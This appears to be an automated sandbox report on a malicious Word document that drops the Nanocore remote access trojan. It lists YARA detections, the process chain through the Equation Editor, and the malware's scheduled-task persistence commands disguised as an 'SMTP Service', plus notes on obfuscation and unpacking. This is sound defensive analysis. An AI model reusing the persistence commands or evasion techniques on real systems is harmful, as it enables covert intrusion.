Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.2374e04.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: catx[1].exe.2.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: smtpsvc.exe.5.dr, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@26/14@47/2
Source: C:\Users\user\AppData\Roaming\cat464923.exe File created: C:\Program Files (x86)\SMTP Service Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$W ORDER Ref PO-298721.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{f9198f9a-66a7-4bba-ab1c-dff8091cd717}
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC580.tmp Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ..................#...............#.....(.P.....................P.......>u...................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................P.......................(.P.....L.......d.......t.......Xw...................................................................... Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: NEW ORDER Ref PO-298721.doc Virustotal: Detection: 23%
Source: NEW ORDER Ref PO-298721.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {C1636649-2706-44BF-BD6B-15CC427FB25D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0
Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe C:\Users\user\AppData\Roaming\cat464923.exe 0 Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Process created: C:\Users\user\AppData\Roaming\cat464923.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\cat464923.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\cat464923.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source: Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp

Data Obfuscation:

barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: catx[1].exe.2.dr, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: smtpsvc.exe.5.dr, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs .Net Code: LateBinding.LateCall(V_1, null, "Invoke", new object[] { 0, V_0 }, null, null)
.NET source code contains potential unpacker
Source: catx[1].exe.2.dr, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: smtpsvc.exe.5.dr, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.2.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.4.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.cat464923.exe.8d0000.0.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.cat464923.exe.8d0000.6.unpack, Form1.cs .Net Code: I_ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC400 push esp; iretd 5_2_002DC569
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_002DC658 pushfd ; iretd 5_2_002DC659
Source: C:\Users\user\AppData\Roaming\cat464923.exe Code function: 5_2_006B4459 push 00000000h; iretd 5_2_006B4464
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 12_2_0059C688 push edx; retn 0059h 12_2_0059C699
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Code function: 13_2_002BC688 push edx; retn 002Bh 13_2_002BC699
Source: initial sample Static PE information: section name: .text entropy: 7.60711640242
Source: initial sample Static PE information: section name: .text entropy: 7.60711640242
Source: 5.2.cat464923.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
